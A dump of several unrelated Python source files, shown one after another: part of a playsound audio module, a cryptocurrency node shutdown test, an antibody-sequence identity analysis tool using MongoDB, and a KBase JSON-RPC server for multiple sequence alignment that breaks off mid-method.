gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make('playbin', 'playbin')
if sound.startswith(('http://', 'https://')):
playbin.props.uri = sound
else:
path = abspath(sound)
if not exists(path):
raise PlaysoundException(u'File not found: {}'.format(path))
playbin.props.uri = 'file://' + pathname2url(path)
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlaysoundException(
"playbin.set_state returned " + repr(set_result))
# FIXME: use some other bus method than poll() with block=False
# https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
logger.debug('Starting play')
if block:
bus = playbin.get_bus()
try:
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
finally:
playbin.set_state(Gst.State.NULL)
logger.debug('Finishing play')
def _playsoundAnotherPython(otherPython, sound, block = True, macOS = False):
'''
Mostly written so that when this is run on python3 on macOS, it can invoke
python2 on macOS... but maybe this idea could be useful on linux, too.
'''
from inspect import getsourcefile
from os.path import abspath, exists
from subprocess import check_call
from threading import Thread
sound = _canonicalizePath(sound)
class PropogatingThread(Thread):
def run(self):
self.exc = None
try:
self.ret = self._target(*self._args, **self._kwargs)
except BaseException as e:
self.exc = e
def join(self, timeout = None):
super().join(timeout)
if self.exc:
raise self.exc
return self.ret
# Check if the file exists...
if not exists(abspath(sound)):
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
playsoundPath = abspath(getsourcefile(lambda: 0))
t = PropogatingThread(target = lambda: check_call([otherPython, playsoundPath, _handlePathOSX(sound) if macOS else sound]))
t.start()
if block:
t.join()
from platform import system
system = system()
if system == 'Windows':
playsound = _playsoundWin
elif system == 'Darwin':
playsound = _playsoundOSX
import sys
if sys.version_info[0] > 2:
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound is relying on a python 2 subprocess. Please use `pip3 install PyObjC` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python', sound, block, macOS = True)
else:
playsound = _playsoundNix
if __name__ != '__main__': # Ensure we don't infinitely recurse trying to get another python instance.
try:
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
except:
logger.warning("playsound is relying on another python subprocess. Please use `pip install pygobject` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/usr/bin/python3', sound, block, macOS = False)
del system
if __name__ == '__main__':
# block is always True if you choose to run this from the command line.
from sys import argv
playsound(argv[1])
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mulecoind shutdown."""
from threading import Thread
from test_framework.test_framework import MulecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MulecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
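        # Two active commands are expected: this getrpcinfo call itself plus the
        # long-running waitfornewblock started in the thread above (assumption based on
        # how getrpcinfo counts in-flight RPCs).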
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
_finder.py
|
#!/usr/bin/python
# filename: _finder.py
#
# Copyright (c) 2015 Bryan Briney
# License: The MIT license (http://opensource.org/licenses/MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
import multiprocessing as mp
import platform
import os
import subprocess as sp
import sys
import tempfile
from threading import Thread
import time
import numpy as np
import pandas as pd
from pymongo import MongoClient
from Bio import SeqIO
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from abtools import color, log, mongodb
from abtools.utils import progbar
def parse_args():
import argparse
parser = argparse.ArgumentParser("For a MongoDB collection, plots the germline divergence against the sequence identity to a given 'subject' sequence.")
parser.add_argument('-d', '--database', dest='db', required=True,
help="Name of the MongoDB database to query. Required.")
parser.add_argument('-c', '--collection', dest='collection', default=None,
help="Name of the MongoDB collection to query. \
If not provided, all collections in the given database will be processed iteratively.")
parser.add_argument('--collection-prefix', dest='collection_prefix', default=None,
help="If supplied, will iteratively process only collections beginning with <collection_prefix>.")
parser.add_argument('-o', '--output', dest='output_dir', default=None,
help="Output directory figure files. If not provided, figures will not be generated. \
Directory will be created if it does not already exist.")
parser.add_argument('-t', '--temp', dest='temp_dir', required=True,
help="Directory for temporary storage. \
Will be created if it does not already exist. Required.")
parser.add_argument('-l', '--log', dest='log', default=None,
help="The log file, to which the blast_parse log info will be written. \
Default is <output>/abfinder.log.")
parser.add_argument('-C', '--cluster', dest="cluster", default=False, action='store_true',
help="Use if performing computation on a Celery cluster. \
If set, input files will be split into many subfiles and passed to a Celery queue. \
If not set, input files will still be split, \
but will be distributed to local processors using multiprocessing.")
parser.add_argument('-i', '--ip', dest='ip', default='localhost',
help="The IP address for the MongoDB server. \
Defaults to 'localhost'.")
parser.add_argument('--port', dest='port', default=27017,
help="The port for the MongoDB server. Defaults to '27017'.")
parser.add_argument('-u', '--user', dest='user', default=None,
help="Username for the MongoDB server. Not used if not provided.")
parser.add_argument('-p', '--password', dest='password', default=None,
help="Password for the MongoDB server. Not used if not provided.")
parser.add_argument('-s', '--standard', dest='standard', required=True,
help='Path to a file containing the standard sequence(s) for which \
identity/divergence will be calculated, in FASTA format. \
                        All sequences in the standard file will be iteratively processed. Required.')
parser.add_argument('-q', '--chain', dest='chain', default='heavy',
choices=['heavy', 'kappa', 'lambda', 'light'],
help="The chain type of the subject sequence. \
Options are 'heavy', 'kappa', 'lambda' and 'light'. \
Default is 'heavy'.")
parser.add_argument('-n', '--no_update', dest='update', action='store_false', default=True,
help="Does not update the MongoDB with AbFinder info. \
Can save some time if the identity calculations aren't needed again.")
parser.add_argument('--no_figure', dest='make_figure', action='store_false', default=True,
help="Does not make the identity/divergence figure. \
Useful if you don't want the figure, just the identity info written to the database.")
parser.add_argument('--single-process-update', dest='single_process_update', action='store_true', default=False,
help="Perform the MongoDB update using a single process (without multiprocessing).")
parser.add_argument('--update-threads', dest='update_threads', type=int, default=25,
help="Number of threads to use when update the MongoDB database. Default is 25.")
parser.add_argument('-N', '--nucleotide', dest='is_aa', action='store_false', default=True,
help="Use nucleotide sequences for alignment. Default is amino acid sequences. \
Ensure standard format matches.")
parser.add_argument('-x', '--xmin', dest='x_min', type=int, default=-1,
help="Minimum X-axis (germline divergence) value for the AbCompare plot. Default is -1.")
parser.add_argument('-X', '--xmax', dest='x_max', type=int, default=35,
help="Maximum X-axis (germline divergence) value for the AbCompare plot. Default is 35.")
parser.add_argument('-y', '--ymin', dest='y_min', type=int, default=65,
help="Minimum Y-axis (mAb identity) value for the AbCompare plot. Default is 65.")
parser.add_argument('-Y', '--ymax', dest='y_max', type=int, default=101,
help="Maximum Y-axis (mAb identity) value for the AbCompare plot. Default is 101.")
parser.add_argument('-g', '--gridsize', dest='gridsize', type=int, default=0,
help="Gridsize for the AbFinder hexbin plot. \
Default is 36 for amino acid sequences and 50 for nucleotide sequences.")
parser.add_argument('--colormap', dest='colormap', default='Blues',
help="Colormap to be used in the AbFinder hexbin plots. \
Can accept a matplotlib cmap or the name of one of matplotlib's builtin cmaps. \
Default is 'Blues'.")
parser.add_argument('--mincount', dest='mincount', default=3, type=int,
help="Minimum number of sequences in a hexbin for that hexbin to be colored. \
Default is 3.")
parser.add_argument('--skip-padding', dest='remove_padding', default=True, action='store_false',
help="If set, will not remove padding field from MongoDB.")
parser.add_argument('-D', '--debug', dest="debug", action='store_true', default=False,
help="If set, will write all failed/exception sequences to file \
and should give more informative errors.")
return parser
class Args(object):
def __init__(self, db=None, collection=None,
output=None, temp=None, log=None, cluster=False,
ip='localhost', port=27017, user=None, password=None, update=True,
standard=None, chain='heavy', is_aa=True,
x_min=-1, x_max=35, y_min=65, y_max=101, gridsize=0, mincount=3,
colormap='Blues', debug=False):
super(Args, self).__init__()
if not all([db, output, temp, standard]):
err = 'You must provide a MongoDB database name, output and temp directories, \
and a file containing one or more comparison (standard) sequences in FASTA format.'
raise RuntimeError(err)
self.db = db
self.collection = collection
self.output_dir = output
self.temp_dir = temp
self.log = log
self.cluster = bool(cluster)
self.ip = ip
self.port = int(port)
self.user = user
self.password = password
self.standard = standard
if chain not in ['heavy', 'kappa', 'lambda', 'light']:
err = 'Please select an appropriate chain. \
Valid choices are: heavy, light, kappa and lambda.'
raise RuntimeError(err)
self.chain = chain
self.update = bool(update)
self.is_aa = bool(is_aa)
self.x_min = int(x_min)
self.x_max = int(x_max)
self.y_min = int(y_min)
self.y_max = int(y_max)
self.gridsize = int(gridsize)
        self.mincount = int(mincount)
self.colormap = colormap
self.debug = bool(debug)
# ================================================
#
# FILES AND DIRECTORIES
#
# ================================================
def make_directories(args):
for d in [args.output_dir, args.temp_dir]:
if d:
_make_direc(d, args)
def _make_direc(d, args):
if not os.path.exists(d):
os.makedirs(d)
if args.cluster:
cmd = 'sudo chmod 777 {}'.format(d)
p = sp.Popen(cmd, shell=True, stdout=sp.PIPE, stderr=sp.PIPE)
stdout, stderr = p.communicate()
def get_standards(args):
standards = []
for s in SeqIO.parse(open(args.standard, 'r'), 'fasta'):
standards.append(s)
return standards
def get_chain(args):
if args.chain == 'light':
return ['kappa', 'lambda']
return [args.chain, ]
def get_sequences(db, collection, temp_dir, args):
files = []
fastas = []
chunksize = 1000
seq_counter = 0
total_seq_counter = 0
query_results = query(db, collection, args)
iden_field = 'aa_identity' if args.is_aa else 'nt_identity'
vdj_field = 'vdj_aa' if args.is_aa else 'vdj_nt'
for seq in query_results:
fastas.append('>{}_{}\n{}'.format(seq['seq_id'], seq[iden_field]['v'], seq[vdj_field]))
seq_counter += 1
total_seq_counter += 1
if seq_counter == chunksize:
files.append(write_to_temp_file(fastas, temp_dir))
fastas = []
seq_counter = 0
if fastas:
files.append(write_to_temp_file(fastas, temp_dir))
return files
def write_to_temp_file(fastas, temp_dir):
tfile = tempfile.NamedTemporaryFile(dir=temp_dir, delete=False)
tfile.write('\n'.join(fastas))
tfile.close()
return tfile.name
def clean_up(files):
for f in files:
os.unlink(f)
# ================================================
#
# MONGO
#
# ================================================
def query(db, collection, args):
coll = db[collection]
chain = get_chain(args)
mongodb.index(db, collection, ['chain'])
print_query_info()
iden_field = 'aa_identity.v' if args.is_aa else 'nt_identity.v'
vdj_field = 'vdj_aa' if args.is_aa else 'vdj_nt'
return coll.find({'chain': {'$in': chain}, 'prod': 'yes'}, {'_id': 0, 'seq_id': 1, iden_field: 1, vdj_field: 1})
def chunker(l, n):
'Generator that produces n-length chunks from iterable l.'
for i in xrange(0, len(l), n):
yield l[i:i + n]
def update_db(db, standard, scores, collection, args):
db = mongodb.get_db(args.db, args.ip, args.port, args.user, args.password)
print_index_info()
mongodb.index(db, collection, ['seq_id'])
print_update_info()
start = time.time()
conn = mongodb.get_connection(args.ip, args.port,
args.user, args.password)
mongo_version = conn.server_info()['version']
standard = standard.replace('.', '_')
g = scores.groupby('identity')
groups = regroup(g.groups)
for g in range(0, len(groups), args.update_threads):
tlist = []
for group in groups[g:g + args.update_threads]:
t = Thread(target=update, args=(db, collection, group, standard, mongo_version, args))
t.start()
tlist.append(t)
for t in tlist:
t.join()
progbar.progress_bar(g + args.update_threads, len(groups))
# if platform.system().lower() == 'darwin' or args.debug or args.single_process_update:
# for i, group in enumerate(groups):
# update(db, collection, group, standard, mongo_version, args)
# progbar.progress_bar(i, len(groups))
# else:
# p = mp.Pool(processes=25)
# async_results = []
# for group in groups:
# async_results.append(p.apply_async(update, args=(db, collection, group, standard, mongo_version, args)))
# monitor_update(async_results)
# p.close()
# p.join()
print('')
run_time = time.time() - start
logger.info('Updating took {} seconds. ({} sequences per second)'.format(round(run_time, 2),
round(len(scores) / run_time, 1)))
def update(db, collection, data, standard, version, args):
db = mongodb.get_db(args.db, args.ip, args.port, args.user, args.password)
coll = db[collection]
score = data[0]
ids = data[1]
mab_id_field = 'mab_identity_aa' if args.is_aa else 'mab_identity_nt'
if int(version.split('.')[0]) < 3:
result = coll.update({'seq_id': {'$in': ids}},
{'$set': {'{}.{}'.format(mab_id_field, standard.lower()): float(score)}},
multi=True)
else:
result = coll.update_many({'seq_id': {'$in': ids}},
{'$set': {'{}.{}'.format(mab_id_field, standard.lower()): float(score)}})
if args.debug:
print('matched: {}'.format(result.matched_count))
print('modified: {}'.format(result.modified_count))
def monitor_update(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
finished = len([r for r in results if r.ready()])
progbar.progress_bar(finished, jobs)
progbar.progress_bar(finished, jobs)
def regroup(oldgs):
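    # Split each identity-score group into chunks of at most 500 seq_ids so that each
    # MongoDB update operates on a bounded batch.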
newgs = []
for og in oldgs:
if len(oldgs[og]) <= 500:
newgs.append((og, oldgs[og]))
else:
for ng in chunker(oldgs[og], 500):
newgs.append((og, ng))
return newgs
# ================================================
#
# FIGURES
#
# ================================================
def make_figure(standard_id, scores, collection, args):
print_fig_info()
sns.set_style('white')
fig_file = os.path.join(args.output_dir, '{0}_{1}_{2}.pdf'.format(args.db, collection, standard_id))
x = list(scores['germ_divergence'].values)
y = list(scores['identity'].values)
xy_vals = zip(x, y)
trunc_xy_vals = [v for v in xy_vals if v[0] <= args.x_max and v[1] >= args.y_min]
x = [v[0] for v in trunc_xy_vals]
y = [v[1] for v in trunc_xy_vals]
# To make sure the gridsize is correct (since it's based on the actual values)
# I need to add a single value near the max and min of each axis.
# They're added just outside the visible plot, so there's no effect on the plot.
x.extend([args.x_min - 1, args.x_max + 1])
y.extend([args.y_min - 1, args.y_max + 1])
# plot params
cmap = color.get_cmap(args.colormap)
plt.subplots_adjust(hspace=0.95)
plt.subplot(111)
    plt.hexbin(x, y, bins='log', cmap=cmap, mincnt=args.mincount, gridsize=set_gridsize(args))
plt.title(standard_id, fontsize=18)
# set and label axes
plt.axis([args.x_min, args.x_max, args.y_min, args.y_max])
plt.xlabel('Germline divergence')
plt.ylabel('{0} identity'.format(standard_id))
# make and label the colorbar
cb = plt.colorbar()
cb.set_label('Sequence count (log10)', labelpad=10)
# save figure and close
plt.savefig(fig_file)
plt.close()
def set_gridsize(args):
if args.gridsize:
return args.gridsize
elif args.is_aa:
return 36
return 50
# ================================================
#
# PRINTING
#
# ================================================
def print_abfinder_start():
logger.info('')
logger.info('')
logger.info('')
logger.info('-' * 25)
logger.info('ABFINDER')
logger.info('-' * 25)
def print_standards_info(standards):
logger.info('')
logger.info('Found {} standard sequence(s):'.format(len(standards)))
logger.info(', '.join([s.id for s in standards]))
def print_collections_info(collections):
logger.info('')
logger.info('Found {} collection(s):'.format(len(collections)))
logger.info(', '.join(collections))
def print_single_standard(standard):
standard_id_string = '{}'.format(standard.id)
logger.info('')
logger.info(standard_id_string)
logger.info('-' * len(standard_id_string))
def print_single_collection(collection):
logger.info('')
logger.info('')
logger.info(collection)
logger.info('-' * len(collection))
def print_query_info():
logger.info('Querying for comparison sequences...')
def print_remove_padding():
logger.info('')
logger.info('Removing MongoDB padding...')
def print_fig_info():
logger.info('Making identity/divergence figure...')
def print_index_info():
logger.info('Indexing the MongoDB collection...')
def print_update_info():
logger.info('Updating the MongoDB database with identity scores:')
# ================================================
#
# IDENTITY JOBS
#
# ================================================
def run_jobs(files, standard, args):
logger.info('Running AbCompare...')
if args.cluster:
return _run_jobs_via_celery(files, standard, args)
else:
return _run_jobs_via_multiprocessing(files, standard, args)
def _run_jobs_via_multiprocessing(files, standard, args):
from abtools.queue.tasks import identity
results = []
if args.debug:
for f in files:
results.extend(identity(f, standard, args.is_aa, args.debug))
else:
p = mp.Pool()
async_results = []
for f in files:
async_results.append(p.apply_async(identity, (f, standard, args.is_aa)))
monitor_mp_jobs(async_results)
for a in async_results:
results.extend(a.get())
p.close()
p.join()
ids = [r[0] for r in results]
identities = pd.Series([r[1] for r in results], index=ids)
divergences = pd.Series([100. - r[2] for r in results], index=ids)
d = {'identity': identities, 'germ_divergence': divergences}
df = pd.DataFrame(d)
return df
def monitor_mp_jobs(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
ready = [ar for ar in results if ar.ready()]
finished = len(ready)
update_progress(finished, jobs)
print('')
def _run_jobs_via_celery(files, standard, args):
from abtools.queue.tasks import identity
async_results = []
for f in files:
async_results.append(identity.delay(f, standard, args.is_aa))
succeeded, failed = monitor_celery_jobs(async_results)
scores = []
for s in succeeded:
scores.extend(s.get())
ids = [r[0] for r in scores]
identities = pd.Series([r[1] for r in scores], index=ids)
divergences = pd.Series([r[2] for r in scores], index=ids)
d = {'identity': identities, 'germ_divergence': divergences}
df = pd.DataFrame(d)
return df
def monitor_celery_jobs(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
succeeded = [ar for ar in results if ar.successful()]
failed = [ar for ar in results if ar.failed()]
finished = len(succeeded) + len(failed)
update_progress(finished, jobs, failed=len(failed))
print('')
return succeeded, failed
def update_progress(finished, jobs, failed=None):
    # `failed` is accepted (and currently ignored) so that monitor_celery_jobs can pass
    # its failure count without raising a TypeError.
pct = int(100. * finished / jobs)
ticks = pct / 2
spaces = 50 - ticks
prog_bar = '\r({}/{}) |{}{}| {}%'.format(finished, jobs, '|' * ticks, ' ' * spaces, pct)
sys.stdout.write(prog_bar)
sys.stdout.flush()
def run(**kwargs):
'''
Mines NGS datasets for identity to known antibody sequences.
All of ``db``, ``output``, ``temp`` and ``standard`` are required.
Args:
db (str): Name of a MongoDB database to query.
collection (str): Name of a MongoDB collection. If not provided, all collections
in ``db`` will be processed iteratively.
output_dir (str): Path to the output directory, into which identity/divergence
figures will be deposited.
temp_dir (str): Path to a temporary directory.
log (str): Path to a log file. If not provided, log information will not be retained.
ip (str): IP address of the MongoDB server. Default is ``localhost``.
port (str): Port of the MongoDB server. Default is ``27017``.
user (str): Username with which to connect to the MongoDB database. If either
of ``user`` or ``password`` is not provided, the connection to the MongoDB
database will be attempted without authentication.
password (str): Password with which to connect to the MongoDB database. If either
of ``user`` or ``password`` is not provided, the connection to the MongoDB
database will be attempted without authentication.
standard (path): Path to a FASTA-formatted file containing one or more 'standard'
sequences, against which the NGS sequences will be compared.
chain (str): Antibody chain. Choices are 'heavy', 'kappa', 'lambda', and 'light'.
Default is 'heavy'. Only NGS sequences matching ``chain`` (with 'light' covering
both 'kappa' and 'lambda') will be compared to the ``standard`` sequences.
update (bool): If ``True``, the MongoDB record for each NGS sequence will be updated
            with identity information for each standard. If ``False``, the update is skipped.
Default is ``True``.
is_aa (bool): If ``True``, the ``standard`` sequences are amino acid sequences. If
            ``False``, they are nucleotide sequences. Default is ``True``.
x_min (int): Minimum x-axis value on identity/divergence plots.
x_max (int): Maximum x-axis value on identity/divergence plots.
y_min (int): Minimum y-axis value on identity/divergence plots.
y_max (int): Maximum y-axis value on identity/divergence plots.
gridsize (int): Relative size of hexbin grids.
mincount (int): Minimum number of sequences in a hexbin for the bin to be colored.
Default is 3.
colormap (str, colormap): Colormap to be used for identity/divergence plots.
Default is ``Blues``.
debug (bool): If ``True``, more verbose logging.
'''
args = Args(**kwargs)
global logger
logger = log.get_logger('abfinder')
main(args)
def run_standalone(args):
logfile = args.log if args.log else os.path.join(args.output_dir, 'abfinder.log')
log.setup_logging(logfile)
global logger
logger = log.get_logger('abfinder')
main(args)
def main(args):
print_abfinder_start()
db = mongodb.get_db(args.db, args.ip, args.port,
args.user, args.password)
make_directories(args)
standards = get_standards(args)
print_standards_info(standards)
collections = mongodb.get_collections(db, args.collection, prefix=args.collection_prefix)
print_collections_info(collections)
for collection in collections:
indexed = False
print_single_collection(collection)
if args.remove_padding:
print_remove_padding()
mongodb.remove_padding(db, collection)
seq_files = get_sequences(db, collection, args.temp_dir, args)
for standard in standards:
print_single_standard(standard)
scores = run_jobs(seq_files, standard, args)
if args.output_dir:
make_figure(standard.id, scores, collection, args)
if args.update:
if not indexed:
mongodb.index(db, collection, 'seq_id')
indexed = True
update_db(db, standard.id, scores, collection, args)
clean_up(seq_files)
if __name__ == '__main__':
parser = parse_args()
args = parser.parse_args()
logfile = args.log if args.log else os.path.join(args.output_dir, 'abfinder.log')
log.setup_logging(logfile)
logger = log.get_logger('abfinder')
main(args)
|
msa_muscleServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'msa_muscle'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from msa_muscle.msa_muscleImpl import msa_muscle
impl_msa_muscle = msa_muscle(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['msa_muscle.build_msa_async'] = ['msa_muscle', 'build_msa']
async_check_methods['msa_muscle.build_msa_check'] = ['msa_muscle', 'build_msa']
sync_methods['msa_muscle.build_msa'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
            raise ValueError('Neither the \'job-service-url\' configuration parameter nor the '
                             '\'KB_JOB_SERVICE_URL\' environment variable is defined')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'msa_muscle'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_msa_muscle.build_msa,
name='msa_muscle.build_msa',
types=[basestring, basestring, basestring])
self.method_authentication['msa_muscle.build_msa'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
